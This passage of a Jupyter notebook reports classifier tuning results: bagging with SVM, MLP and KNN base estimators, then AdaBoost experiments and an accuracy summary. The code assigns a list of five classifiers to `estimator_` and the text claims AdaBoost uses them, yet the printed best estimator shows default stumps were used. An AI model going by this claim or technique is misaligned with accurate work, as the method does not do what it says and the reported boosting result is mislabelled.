Standard Deviation cross validation score: 0.017649832676202803
Accuracy on Test Set: 0.7678777393310265
Accuracy: 0.7678777393310265
This is not the best base estimator
Confusion matrix
[[2100 439]
[ 366 563]]
True Negatives (TN) = 2100
False Positives (FP) = 439
False Negatives (FN) = 366
True Positives (TP) = 563
Accuracy: 0.7678777393310265
Sensitivity: 0.6060279870828849
Specificity: 0.8270972823946435
Geometric Mean: 0.7079859470154406
Precision: 0.7739759181239302
Recall: 0.7678777393310265
f1-score: 0.7705725432085907
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.8516 0.8271 0.8392 2539
1 0.5619 0.6060 0.5831 929
accuracy 0.7679 3468
macro avg 0.7067 0.7166 0.7111 3468
weighted avg 0.7740 0.7679 0.7706 3468
Current Time: 2024-01-03 02:43:52
The entire notebook runtime so far is 476 minutes
------------------------------------
Base estimator is svm
------------------------------------
Performing GridSearchCV
Fitting model
Best Parameters: {'estimator__C': 10, 'estimator__kernel': 'rbf', 'max_features': 1.0, 'max_samples': 1.0, 'n_estimators': 200}
Best Scores: 0.8493116140298289
Cross validation scores: [0.86411609 0.8469657 0.84412153 0.85336856 0.85336856 0.83619551
0.86129458 0.83619551 0.85072655 0.84676354]
Mean cross validation score: 0.8493116140298289
Standard Deviation cross validation score: 0.008835617033570638
Accuracy on Test Set: 0.879757785467128
Accuracy: 0.879757785467128
The best base_estimator so far is svm, with accuracy of 0.879757785467128
Confusion matrix
[[2360 179]
[ 238 691]]
True Negatives (TN) = 2360
False Positives (FP) = 179
False Negatives (FN) = 238
True Positives (TP) = 691
Accuracy: 0.879757785467128
Sensitivity: 0.7438105489773951
Specificity: 0.9294998030720756
Geometric Mean: 0.8314876780791289
Precision: 0.8778159880066467
Recall: 0.879757785467128
f1-score: 0.8784765628828611
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9084 0.9295 0.9188 2539
1 0.7943 0.7438 0.7682 929
accuracy 0.8798 3468
macro avg 0.8513 0.8367 0.8435 3468
weighted avg 0.8778 0.8798 0.8785 3468
Current Time: 2024-01-03 03:34:30
The entire notebook runtime so far is 526 minutes
------------------------------------
Base estimator is mlp
------------------------------------
Performing GridSearchCV
Fitting model
Best Parameters: {'estimator__alpha': 0.01, 'estimator__hidden_layer_sizes': (150, 100), 'estimator__max_iter': 300, 'max_features': 0.5, 'max_samples': 1.0, 'n_estimators': 100}
Best Scores: 0.8528776276302443
Cross validation scores: [0.86543536 0.85092348 0.84015852 0.85733157 0.85601057 0.84147952
0.86129458 0.84015852 0.86261559 0.85336856]
Mean cross validation score: 0.8528776276302443
Standard Deviation cross validation score: 0.009003056875692392
Accuracy on Test Set: 0.8861014994232987
Accuracy: 0.8861014994232987
The best base_estimator so far is mlp, with accuracy of 0.8861014994232987
Confusion matrix
[[2392 147]
[ 248 681]]
True Negatives (TN) = 2392
False Positives (FP) = 147
False Negatives (FN) = 248
True Positives (TP) = 681
Accuracy: 0.8861014994232987
Sensitivity: 0.7330462863293864
Specificity: 0.942103190232375
Geometric Mean: 0.831026621077153
Precision: 0.8836668740967673
Recall: 0.8861014994232987
f1-score: 0.8839384237274986
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9061 0.9421 0.9237 2539
1 0.8225 0.7330 0.7752 929
accuracy 0.8861 3468
macro avg 0.8643 0.8376 0.8495 3468
weighted avg 0.8837 0.8861 0.8839 3468
Current Time: 2024-01-03 06:03:05
The entire notebook runtime so far is 675 minutes
------------------------------------
Base estimator is knn
------------------------------------
Performing GridSearchCV
Fitting model
Best Parameters: {'estimator__n_neighbors': 10, 'estimator__weights': 'uniform', 'max_features': 0.5, 'max_samples': 1.0, 'n_estimators': 100}
Best Scores: 0.8931576177314284
Cross validation scores: [0.90237467 0.8944591 0.88243065 0.89564069 0.88771466 0.88375165
0.9009247 0.89299868 0.9009247 0.89035667]
Mean cross validation score: 0.8931576177314284
Standard Deviation cross validation score: 0.0067417000143228396
Accuracy on Test Set: 0.9163783160322952
Accuracy: 0.9163783160322952
The best base_estimator so far is knn, with accuracy of 0.9163783160322952
Confusion matrix
[[2403 136]
[ 154 775]]
True Negatives (TN) = 2403
False Positives (FP) = 136
False Negatives (FN) = 154
True Positives (TP) = 775
Accuracy: 0.9163783160322952
Sensitivity: 0.8342303552206674
Specificity: 0.9464356045687279
Geometric Mean: 0.8885636221412944
Precision: 0.9159160686099473
Recall: 0.9163783160322952
f1-score: 0.9161169804337237
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9398 0.9464 0.9431 2539
1 0.8507 0.8342 0.8424 929
accuracy 0.9164 3468
macro avg 0.8952 0.8903 0.8927 3468
weighted avg 0.9159 0.9164 0.9161 3468
Current Time: 2024-01-03 06:04:38
The entire notebook runtime so far is 677 minutes
After checking each base_estimator, the best base_estimator is knn, with accuracy of 0.9163783160322952, and best_params of {'estimator__n_neighbors': 10, 'estimator__weights': 'uniform', 'max_features': 0.5, 'max_samples': 1.0, 'n_estimators': 100}
In this example:
LR, SVC, KNN, NB, MLP are individual base classifiers.
An AdaBoostClassifier is created with these base classifiers.
The AdaBoost classifier is trained on the training set.
Predictions are made on the test set, and the performance of the AdaBoost classifier is evaluated.
You can adjust the parameters such as n_estimators and learning_rate based on your specific needs. Note that AdaBoost works best with weak learners, so base classifiers like decision trees with limited depth are commonly used.
The AdaBoostClassifier can use different base classifiers (weak learners) as its base estimator. The base_estimator parameter of the AdaBoostClassifier allows you to specify the type of weak learner to use. If not specified, the default is a decision stump (DecisionTreeClassifier(max_depth=1)).
Using RandomForestClassifier as a base estimator for AdaBoostClassifier is generally not a common practice because AdaBoost is typically used with weak learners, and Random Forests are already ensemble methods that use multiple decision trees.
However, if you still want to experiment with this combination, you can specify RandomForestClassifier as a base_estimator in AdaBoostClassifier.
Keep in mind that using RandomForestClassifier as a base estimator for AdaBoost might not provide significant advantages, as Random Forests are already powerful ensemble models. AdaBoost is often more beneficial when combined with weak learners like shallow decision trees (stumps). It's recommended to experiment with different combinations and evaluate their performance on your specific dataset.
# HINT: in sklearn.ensemble.AdaBoostClassifier version 1.2.0, the "base_estimator" parameter was renamed to "estimator"
# The base_estimator parameter is deprecated in sklearn version 1.2.0, and will be removed in version 1.4.0
# https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.BaggingClassifier.html
# Check to see if this version of AdaBoostClassifer() expects to have a "base_estimator" or "estimator" parameter
# Print the version of scikit-learn
print("Currently installed scikit-learn version is:", sklearn.__version__)
# Create an instance of the BaggingClassifier model
clf = AdaBoostClassifier()
# Figure out which parameters exist
default_params = clf.get_params()
print(f"Default parameters are {default_params}")
# Check to see if the base_estimator parameter exists in the BaggingClassifier, which would indicate an outdated version of scikit-learn
desired_parameter1 = 'base_estimator' # Replace with the parameter you want to check
desired_parameter2 = 'estimator' # Replace with the parameter you want to check
# This if block will only be executed if the scikit-learn package is older than 1.2
if (desired_parameter1 in clf.get_params()) and not (desired_parameter2 in clf.get_params()) :
print('\n')
print(f"WARNING: the '{desired_parameter1}' parameter exists, but the '{desired_parameter2}' parameter does not exist the AdaBoostClassifier.")
print(f"The parameter 'base_estimator' was deprecated in favor of 'estimator' in sklearn 1.2.0, will be removed entirely in sklearn 1.4.0.")
print(f"Your currently installed version of scikit-learn is", sklearn.__version__)
print(f"You may wish to update your installed version of scikit-learn to a minimum of 1.2.0 so you can use the 'estimator__' parameter in the next cell.")
print(f"If you are unable to update your installed version of scikit-learn, you will need to change 'estimator__' to 'base_estimator__' in the following cell for compatibility with your version of scikit-learn.")
print(f"If you are using Anaconda Navigator, you can upgrade with: conda update conda, conda update scikit-learn")
print(f"If you are not using Anaconda Navigator, you can upgrade with: pip install --upgrade scikit-learn")
Currently installed scikit-learn version is: 1.3.0
Default parameters are {'algorithm': 'SAMME.R', 'base_estimator': 'deprecated', 'estimator': None, 'learning_rate': 1.0, 'n_estimators': 50, 'random_state': None}
# AdaBoostClassifier with multiple base classifiers
# Define multiple base classifiers
base_classifiers = [
#DecisionTreeClassifier(max_depth=1), # Decision stump
LogisticRegression(C=100, max_iter=100, penalty='l2', solver='liblinear'),
BernoulliNB(alpha=0.1),
SVC(kernel='linear', C=0.1), # Support Vector Machine with linear kernel
KNeighborsClassifier(n_neighbors=10, weights='uniform'),
MLPClassifier(hidden_layer_sizes=[50,25], max_iter=800)
]
# Create the AdaBoostClassifier, setting estimator=None because we will add multiple base_classifiers in the next step
clf = AdaBoostClassifier(estimator=None, n_estimators=50, random_state=42)
# Set the base classifiers as the base estimator
clf.estimator_ = base_classifiers
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict on the test set
y_pred = clf.predict(X_test)
# Evaluate the accuracy
accuracy = accuracy_score(y_test_label, y_pred)
print(f"Accuracy: {accuracy}")
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
print('\n')
# save accuracy for later comparison
accuracy_ensemble_boosting = accuracy
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Accuracy: 0.9411764705882353 Accuracy: 0.9411764705882353
Confusion matrix
[[2388 151]
[ 53 876]]
True Negatives (TN) = 2388
False Positives (FP) = 151
False Negatives (FN) = 53
True Positives (TP) = 876
Accuracy: 0.9411764705882353
Sensitivity: 0.9429494079655544
Specificity: 0.9405277668373375
Geometric Mean: 0.9417378090075987
Precision: 0.9447177455772251
Recall: 0.9411764705882353
f1-score: 0.9420712804302739
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9783 0.9405 0.9590 2539
1 0.8530 0.9429 0.8957 929
accuracy 0.9412 3468
macro avg 0.9156 0.9417 0.9274 3468
weighted avg 0.9447 0.9412 0.9421 3468
Current Time: 2024-01-03 06:04:39
The entire notebook runtime so far is 677 minutes
print(f"Performing hyperparameter optimization for AdaBoostClassifier")
# Define multiple base classifiers
base_classifiers = [
LogisticRegression(C=100, max_iter=100, penalty='l2', solver='liblinear'),
BernoulliNB(alpha=0.1),
SVC(kernel='linear', C=0.1), # Support Vector Machine with linear kernel
KNeighborsClassifier(n_neighbors=10, weights='uniform'),
MLPClassifier(hidden_layer_sizes=[50,25], max_iter=800)
]
# Define the hyperparameters to tune for AdaBoostClassifier
param_grid = {
'n_estimators': [50, 100, 200], # Number of boosting rounds
'learning_rate': [0.01, 0.1, 1.0] # Weight applied to each classifier
}
# Create the AdaBoostClassifier, setting estimator=None because we will add multiple base_classifiers in the next step
clf = AdaBoostClassifier(estimator=None, random_state=42)
# Set the base classifiers as the base_estimator
clf.estimator_ = base_classifiers
# Use GridSearchCV for hyperparameter tuning
print(f"Performing GridSearchCV")
grid_search = GridSearchCV(clf, param_grid, cv=5, scoring='accuracy')
print(f"Fitting model")
grid_search.fit(X_train_resampled, y_train_label_resampled)
# Validate on Test Set
clf = grid_search.best_estimator_
print(f"Found best_estimator_ {clf}")
y_pred = clf.predict(X_test)
# Perform cross-validation and return both scores and standard deviations
cross_val_score_result = cross_val_score(clf, X_train_resampled, y_train_label_resampled, cv=cv_count)
print(f"Cross validation scores: {cross_val_score_result}")
print(f"Mean cross validation score: {cross_val_score_result.mean()}")
print(f"Standard Deviation cross validation score: {cross_val_score_result.std()}")
# Evaluate the accuracy
accuracy = accuracy_score(y_test_label, y_pred)
print(f"Final Accuracy on Test Set: {accuracy}")
# This method of calculating accuracy generates an error with AdaBoostClassifier
#accuracy = clf.score(X_test, y_test_label)
#print("Accuracy:", accuracy)
#print('\n')
# save accuracy for later comparison
accuracy_ensemble_boosting = accuracy
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Performing hyperparameter optimization for AdaBoostClassifier Performing GridSearchCV Fitting model Found best_estimator_ AdaBoostClassifier(n_estimators=100, random_state=42) Cross validation scores: [0.94854881 0.9525066 0.94319683 0.94848085 0.94583884 0.91941876 0.92338177 0.93923382 0.94055482 0.9326288 ] Mean cross validation score: 0.9393789887174411 Standard Deviation cross validation score: 0.010473106700581276 Final Accuracy on Test Set: 0.9457900807381776
Confusion matrix
[[2420 119]
[ 69 860]]
True Negatives (TN) = 2420
False Positives (FP) = 119
False Negatives (FN) = 69
True Positives (TP) = 860
Accuracy: 0.9457900807381776
Sensitivity: 0.9257265877287406
Specificity: 0.9531311539976368
Geometric Mean: 0.9393289364478181
Precision: 0.9471428867935583
Recall: 0.9457900807381776
f1-score: 0.9462308382510762
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9723 0.9531 0.9626 2539
1 0.8784 0.9257 0.9015 929
accuracy 0.9458 3468
macro avg 0.9254 0.9394 0.9320 3468
weighted avg 0.9471 0.9458 0.9462 3468
Current Time: 2024-01-03 06:05:27
The entire notebook runtime so far is 677 minutes
print(f"LR accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_lr_undersampled_unoptimized*100:.2f}%")
print(f"LR accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_lr_undersampled_optimized*100:.2f}%")
print('\n')
print(f"DT accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_dt_undersampled_unoptimized*100:.2f}%")
print(f"DT accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_dt_undersampled_optimized*100:.2f}%")
print('\n')
print(f"DS accuracy on undersampled balanced data, without hyperparameter optimimization: {accuracy_ds_undersampled_unoptimized*100:.2f}%")
print(f"DS accuracy on undersampled balanced data, with hyperparameter optimimization: {accuracy_ds_undersampled_optimized*100:.2f}%")
print('\n')
print(f"RF accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_rf_undersampled_unoptimized*100:.2f}%")
print(f"RF accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_rf_undersampled_optimized*100:.2f}%")
print('\n')
print(f"NB accuracy on undersampled balanced data, without hyperparameter optimimization: {accuracy_nb_undersampled_unoptimized*100:.2f}%")
print(f"NB accuracy on undersampled balanced data, with hyperparameter optimimization: {accuracy_nb_undersampled_optimized*100:.2f}%")
print('\n')
print(f"SVM accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_svm_undersampled_unoptimized*100:.2f}%")
print(f"SVM accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_svm_undersampled_optimized*100:.2f}%")
print('\n')
print(f"KNN accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_knn_undersampled_unoptimized*100:.2f}%")
print(f"KNN accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_knn_undersampled_optimized*100:.2f}%")
print('\n')
print(f"MLP accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_mlp_undersampled_unoptimized*100:.2f}%")
print(f"MLP accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_mlp_undersampled_optimized*100:.2f}%")
print('\n')
print(f"GB accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_gb_undersampled_unoptimized*100:.2f}%")
print(f"GB accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_gb_undersampled_optimized*100:.2f}%")
print('\n')
print(f"XGB accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_xgb_undersampled_unoptimized*100:.2f}%")
print(f"XGB accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_xgb_undersampled_optimized*100:.2f}%")
print('\n')
print(f"Ensemble voting accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_ensemble_voting*100:.2f}%")
print(f"Ensemble stacking accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_ensemble_stacking*100:.2f}%")
print(f"Ensemble bagging accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_ensemble_bagging*100:.2f}%")
print(f"Ensemble boosting accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_ensemble_boosting*100:.2f}%")
LR accuracy on undersampled balanced data, before hyperparameter optimimization: 87.17% LR accuracy on undersampled balanced data, after hyperparameter optimimization: 87.40% DT accuracy on undersampled balanced data, before hyperparameter optimimization: 93.05% DT accuracy on undersampled balanced data, after hyperparameter optimimization: 95.62% DS accuracy on undersampled balanced data, without hyperparameter optimimization: 82.61% DS accuracy on undersampled balanced data, with hyperparameter optimimization: 82.61% RF accuracy on undersampled balanced data, before hyperparameter optimimization: 95.13% RF accuracy on undersampled balanced data, after hyperparameter optimimization: 95.24% NB accuracy on undersampled balanced data, without hyperparameter optimimization: 76.73% NB accuracy on undersampled balanced data, with hyperparameter optimimization: 76.79% SVM accuracy on undersampled balanced data, before hyperparameter optimimization: 87.72% SVM accuracy on undersampled balanced data, after hyperparameter optimimization: 87.77% KNN accuracy on undersampled balanced data, before hyperparameter optimimization: 84.08% KNN accuracy on undersampled balanced data, after hyperparameter optimimization: 88.12% MLP accuracy on undersampled balanced data, before hyperparameter optimimization: 87.89% MLP accuracy on undersampled balanced data, after hyperparameter optimimization: 87.86% GB accuracy on undersampled balanced data, before hyperparameter optimimization: 95.62% GB accuracy on undersampled balanced data, after hyperparameter optimimization: 95.50% XGB accuracy on undersampled balanced data, before hyperparameter optimimization: 95.50% XGB accuracy on undersampled balanced data, after hyperparameter optimimization: 95.62% Ensemble voting accuracy on undersampled balanced data, after hyperparameter optimimization: 88.55% Ensemble stacking accuracy on undersampled balanced data, after hyperparameter optimimization: 90.51% Ensemble bagging accuracy on undersampled balanced data, after hyperparameter optimimization: 88.52% Ensemble boosting accuracy on undersampled balanced data, after hyperparameter optimimization: 94.58%
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Current Time: 2024-01-03 06:05:27 The entire notebook runtime so far is 677 minutes